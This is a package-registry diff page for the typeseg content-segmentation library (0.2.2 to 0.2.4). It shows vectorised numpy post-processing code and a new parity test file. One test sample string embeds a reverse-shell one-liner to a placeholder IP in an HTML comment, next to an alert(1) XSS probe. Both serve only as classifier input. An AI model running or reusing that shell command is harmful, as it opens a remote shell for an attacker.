PyPI - typeseg - Versions diffs - 0.2.2__tar.gz → 0.2.4__tar.gz - Mend

typeseg 0.2.2__tar.gz → 0.2.4__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (33) hide show

{typeseg-0.2.2 → typeseg-0.2.4}/PKG-INFO RENAMED Viewed

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: typeseg
-Version: 0.2.2
+Version: 0.2.4
 Summary: Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba).
 Author: Martin Dallinger
 License-Expression: Apache-2.0
@@ -249,3 +249,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
 the interactive viewer also applies. The viewer has further heuristics
 (`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
 `viewers/core.py` for those.
+These passes are cheap, but on long inputs they run on the CPU and can outweigh the
+model's own forward pass — so the highest throughput is with post-processing off,
+exposing the raw per-character argmax:
+```python
+raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
+              min_run_normalize=False, paired_delimiter_fill=False)
+result = precise(text, raw)
+```
+The trade-off is noisier segments (single-character runs, frayed boundaries); the
+default keeps post-processing on for cleaner, deployment-style output.

{typeseg-0.2.2 → typeseg-0.2.4}/README.md RENAMED Viewed

@@ -226,3 +226,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
 the interactive viewer also applies. The viewer has further heuristics
 (`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
 `viewers/core.py` for those.
+These passes are cheap, but on long inputs they run on the CPU and can outweigh the
+model's own forward pass — so the highest throughput is with post-processing off,
+exposing the raw per-character argmax:
+```python
+raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
+              min_run_normalize=False, paired_delimiter_fill=False)
+result = precise(text, raw)
+```
+The trade-off is noisier segments (single-character runs, frayed boundaries); the
+default keeps post-processing on for cleaner, deployment-style output.

{typeseg-0.2.2 → typeseg-0.2.4}/pyproject.toml RENAMED Viewed

@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
 [project]
 name = "typeseg"
-version = "0.2.2"
+version = "0.2.4"
 description = "Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba)."
 readme = "README.md"
 license = "Apache-2.0"

typeseg-0.2.4/tests/test_postprocess_parity.py ADDED Viewed

@@ -0,0 +1,139 @@
+"""Regression guards for the vectorised post-processing helpers.
+The hot helpers (``_runs``, ``relabel_whitespace``, ``confidence_gate``,
+``build_segments``) were rewritten from per-character Python loops to vectorised
+numpy. Each must stay bit-identical to a naive reference. We also run the full
+pipeline on representative samples *looped* x1/x4/x16 so inputs cross the
+1536-byte U-Net window (multi-window seams) and post-processing runs over long
+sequences -- the regime where the optimisations matter.
+"""
+import random
+import numpy as np
+import pytest
+import typeseg
+from typeseg import _postprocess as pp
+# --- naive references (the pre-optimisation implementations) ---------------
+def _runs_naive(labels):
+    runs = []
+    if not labels:
+        return runs
+    start = 0
+    for i in range(1, len(labels) + 1):
+        if i == len(labels) or labels[i] != labels[start]:
+            runs.append((start, i, labels[start]))
+            start = i
+    return runs
+def _relabel_naive(text, labels):
+    n = len(text)
+    if n == 0:
+        return labels
+    is_ws = [c in pp._WHITESPACE for c in text]
+    if not any(is_ws):
+        return labels
+    left, right = [-1] * n, [-1] * n
+    last = -1
+    for i in range(n):
+        if not is_ws[i]:
+            last = labels[i]
+        left[i] = last
+    last = -1
+    for i in range(n - 1, -1, -1):
+        if not is_ws[i]:
+            last = labels[i]
+        right[i] = last
+    out = list(labels)
+    for i in range(n):
+        if is_ws[i]:
+            if left[i] != -1:
+                out[i] = left[i]
+            elif right[i] != -1:
+                out[i] = right[i]
+    return out
+def _gate_naive(char_probs, labels, threshold, other_index):
+    if threshold <= 0.0 or char_probs.size == 0:
+        return labels
+    maxp = char_probs.max(axis=1)
+    return [other_index if maxp[i] < threshold else lab for i, lab in enumerate(labels)]
+# --- helper parity ---------------------------------------------------------
+def test_runs_matches_naive():
+    rng = random.Random(0)
+    for _ in range(500):
+        n = rng.randint(0, 300)
+        labels = [rng.randint(0, 4) for _ in range(n)]
+        assert pp._runs(labels) == _runs_naive(labels)
+def test_relabel_whitespace_matches_naive():
+    rng = random.Random(1)
+    alphabets = ["ab \t\n", "x ", " \t\n\r", "abcde "]
+    for _ in range(2000):
+        n = rng.randint(0, 60)
+        alpha = rng.choice(alphabets)
+        text = "".join(rng.choice(alpha) for _ in range(n))
+        labels = [rng.randint(0, 6) for _ in range(n)]
+        assert pp.relabel_whitespace(text, list(labels)) == _relabel_naive(text, list(labels))
+def test_confidence_gate_matches_naive():
+    rng = np.random.default_rng(2)
+    for _ in range(200):
+        n = int(rng.integers(0, 400))
+        cp = rng.random((n, 35)).astype(np.float32)
+        labels = [int(x) for x in rng.integers(0, 35, n)]
+        for thr in (0.0, 0.1, 0.3, 0.9):
+            got = pp.confidence_gate(cp, list(labels), thr, 35)
+            assert got == _gate_naive(cp, list(labels), thr, 35)
+            if thr > 0 and n > 0:  # gated path returns Python ints (not numpy scalars)
+                assert all(isinstance(x, int) for x in got)
+# --- full pipeline on looped samples (multi-window) ------------------------
+SAMPLES = [
+    '.btn { color: #3498db; }\nconst f = (x) => x + 1;\n<div onclick="alert(1)">hi</div>\n'
+    "UPDATE life SET status = 'ok' WHERE n > 9;\n<!-- sh -i >& /dev/udp/1.2.3.4/9 0>&1 -->\n",
+    '{\n  "users": [{"id": 1, "name": "Alice"}, {"id": 2, "name": "Bob"}],\n  "page": 1\n}',
+    "# My Project\n\n```\npip install x\n```\n\nA tool that does `things`. MIT.\n",
+    "FROM python:3.12-slim\nRUN apt-get update && rm -rf /var/lib/apt/lists/*\nCMD [\"app\"]\n",
+]
+@pytest.mark.parametrize("k", [1, 4, 16])
+@pytest.mark.parametrize("fn", [typeseg.fast, typeseg.precise])
+def test_pipeline_consistent_on_looped_samples(fn, k):
+    for s in SAMPLES:
+        text = s * k
+        r = fn(text)
+        n = len(text)
+        # per-char arrays line up with the text length
+        assert len(r.char_labels) == n
+        assert len(r.char_confidence) == n
+        assert r.char_probs.shape == (n, len(r.labels))
+        # segments tile the whole text contiguously, no gaps/overlaps
+        assert r.segments[0].start == 0
+        assert r.segments[-1].end == n
+        for a, b in zip(r.segments, r.segments[1:]):
+            assert a.end == b.start
+        # each segment's label matches the per-char labels it covers
+        for seg in r.segments:
+            assert all(lab == seg.label for lab in r.char_labels[seg.start:seg.end])
+def test_pipeline_deterministic_when_looped():
+    for fn in (typeseg.fast, typeseg.precise):
+        text = SAMPLES[0] * 8
+        a, b = fn(text), fn(text)
+        assert a.char_labels == b.char_labels
+        assert [s.label for s in a.segments] == [s.label for s in b.segments]

{typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_postprocess.py RENAMED Viewed

@@ -17,15 +17,18 @@ _WHITESPACE = set(" \t\n\r\f\v")
 def _runs(labels: List[int]) -> List[Tuple[int, int, int]]:
-    runs: List[Tuple[int, int, int]] = []
-    if not labels:
-        return runs
-    start = 0
-    for i in range(1, len(labels) + 1):
-        if i == len(labels) or labels[i] != labels[start]:
-            runs.append((start, i, labels[start]))
-            start = i
-    return runs
+    # Contiguous equal-label spans. Vectorised: the change points are where adjacent
+    # labels differ. This is called once per post-processing pass over the full
+    # sequence, so the pure-Python scan (with its per-iteration len()) dominated the
+    # pipeline; np.diff finds the boundaries in C. Output is identical.
+    n = len(labels)
+    if n == 0:
+        return []
+    arr = np.asarray(labels)
+    cuts = np.flatnonzero(arr[1:] != arr[:-1]) + 1
+    starts = [0, *cuts.tolist()]
+    ends = [*cuts.tolist(), n]
+    return [(s, e, int(labels[s])) for s, e in zip(starts, ends)]
 def relabel_whitespace(text: str, labels: List[int]) -> List[int]:
@@ -34,29 +37,21 @@ def relabel_whitespace(text: str, labels: List[int]) -> List[int]:
     n = len(text)
     if n == 0:
         return labels
-    is_ws = [c in _WHITESPACE for c in text]
-    if not any(is_ws):
+    ws = np.fromiter((c in _WHITESPACE for c in text), dtype=bool, count=n)
+    if not ws.any():
         return labels
-    left = [-1] * n
-    right = [-1] * n
-    last = -1
-    for i in range(n):
-        if not is_ws[i]:
-            last = labels[i]
-        left[i] = last
-    last = -1
-    for i in range(n - 1, -1, -1):
-        if not is_ws[i]:
-            last = labels[i]
-        right[i] = last
-    out = list(labels)
-    for i in range(n):
-        if is_ws[i]:
-            if left[i] != -1:
-                out[i] = left[i]
-            elif right[i] != -1:
-                out[i] = right[i]
-    return out
+    labels_arr = np.asarray(labels)
+    pos = np.arange(n)
+    # left_src[i] = index of nearest non-ws char at <= i (-1 if none): running max of
+    # the non-ws indices. right_src[i] = nearest non-ws at >= i (n if none): reverse
+    # running min. A whitespace char takes its left host's label, else the right's.
+    left_src = np.maximum.accumulate(np.where(ws, -1, pos))
+    right_src = np.minimum.accumulate(np.where(ws, n, pos)[::-1])[::-1]
+    src = np.where(left_src >= 0, left_src, right_src)        # prefer left, fall back right
+    take = ws & (src < n)                                     # leave ws with no host at all
+    out = labels_arr.copy()
+    out[take] = labels_arr[src[take]]
+    return out.tolist()
 def confidence_gate(char_probs: np.ndarray, labels: List[int], threshold: float, other_index: int) -> List[int]:
@@ -64,7 +59,7 @@ def confidence_gate(char_probs: np.ndarray, labels: List[int], threshold: float,
     if threshold <= 0.0 or char_probs.size == 0:
         return labels
     maxp = char_probs.max(axis=1)
-    return [other_index if maxp[i] < threshold else lab for i, lab in enumerate(labels)]
+    return np.where(maxp < threshold, other_index, np.asarray(labels, dtype=np.intp)).tolist()
 def normalize_short_runs(labels: List[int], char_probs: np.ndarray, min_run_chars: int,
@@ -424,16 +419,22 @@ def paired_delimiter_fill(text: str, labels: List[int], char_probs: np.ndarray,
             if cur_score is None:
                 cur_score = _boundary_local_score(text, cur_start) + _boundary_local_score(text, cur_end)
             best_start, best_end, best_score = cur_start, cur_end, cur_score
+            n_text = len(text)
             for ls in range(-max_shift, max_shift + 1):
                 cs = cur_start + ls
                 if cs < left_run[0] or cs >= cur_end:
                     continue
+                # The wrap is valid only if text[cs-1] opens a pair; its required
+                # closing char is fixed by the left shift, so resolve it once here
+                # instead of calling _matching_wrap for every (ls, rs) combination.
+                close_needed = _WRAP_OPEN_TO_CLOSE.get(text[cs - 1]) if cs > 0 else None
+                if close_needed is None:
+                    continue
                 for rs in range(-max_shift, max_shift + 1):
                     ce = cur_end + rs
                     if ce <= cs or ce > right_run[1] or (cs == cur_start and ce == cur_end):
                         continue
-                    if not _matching_wrap(text[cs - 1] if cs > 0 else "",
-                                          text[ce] if ce < len(text) else ""):
+                    if (text[ce] if ce < n_text else "") != close_needed:
                         continue
                     sc = _score_wrapped(text, char_probs, left_run, mid_run, right_run, cs, ce)
                     if sc is not None and sc > best_score + 1e-6:
@@ -452,21 +453,27 @@ def paired_delimiter_fill(text: str, labels: List[int], char_probs: np.ndarray,
 def build_segments(text: str, labels: List[int], char_probs: np.ndarray,
                    label_names: List[str], other_index: int, other_label: str) -> Tuple[List[Segment], List[str], List[float]]:
     n = len(text)
-    char_conf: List[float] = []
-    char_label_names: List[str] = []
-    for i in range(n):
-        lab = labels[i]
-        if char_probs.size:
-            known_max = float(char_probs[i].max())
-            conf = (1.0 - known_max) if lab == other_index else float(char_probs[i, lab])
-        else:
-            conf = 0.0
-        char_conf.append(conf)
-        char_label_names.append(other_label if lab == other_index else label_names[lab])
+    # Per-char confidence, vectorised. `other` (no probability column) scores
+    # 1 - max(known); every other label scores its own column. The old per-char
+    # `char_probs[i].max()` Python loop did n separate numpy reductions and was the
+    # bottleneck of the whole pipeline -- this is the same result in two reductions.
+    if char_probs.size:
+        lab_arr = np.asarray(labels, dtype=np.intp)
+        is_other = lab_arr == other_index
+        known_max = char_probs.max(axis=1)                               # (n,)
+        safe_lab = np.where(is_other, 0, lab_arr)                        # avoid OOB at other_index
+        picked = char_probs[np.arange(n), safe_lab]                      # (n,) chosen-label prob
+        conf_arr = np.where(is_other, 1.0 - known_max, picked).astype(np.float64)
+    else:
+        conf_arr = np.zeros(n, dtype=np.float64)
+    char_conf: List[float] = conf_arr.tolist()
+    char_label_names: List[str] = [
+        other_label if lab == other_index else label_names[lab] for lab in labels
+    ]
     segments: List[Segment] = []
     for s, e, lab in _runs(labels):
         name = other_label if lab == other_index else label_names[lab]
-        conf = float(np.mean(char_conf[s:e])) if e > s else 0.0
+        conf = float(conf_arr[s:e].mean()) if e > s else 0.0
         segments.append(Segment(start=s, end=e, label=name, confidence=conf, text=text[s:e]))
     return segments, char_label_names, char_conf

{typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/PKG-INFO RENAMED Viewed

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: typeseg
-Version: 0.2.2
+Version: 0.2.4
 Summary: Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba).
 Author: Martin Dallinger
 License-Expression: Apache-2.0
@@ -249,3 +249,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
 the interactive viewer also applies. The viewer has further heuristics
 (`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
 `viewers/core.py` for those.
+These passes are cheap, but on long inputs they run on the CPU and can outweigh the
+model's own forward pass — so the highest throughput is with post-processing off,
+exposing the raw per-character argmax:
+```python
+raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
+              min_run_normalize=False, paired_delimiter_fill=False)
+result = precise(text, raw)
+```
+The trade-off is noisier segments (single-character runs, frayed boundaries); the
+default keeps post-processing on for cleaner, deployment-style output.

{typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/SOURCES.txt RENAMED Viewed

@@ -3,6 +3,7 @@ README.md
 pyproject.toml
 tests/test_cupy_parity.py
 tests/test_distribution.py
+tests/test_postprocess_parity.py
 tests/test_postprocess_perf.py
 typeseg/__init__.py
 typeseg/__main__.py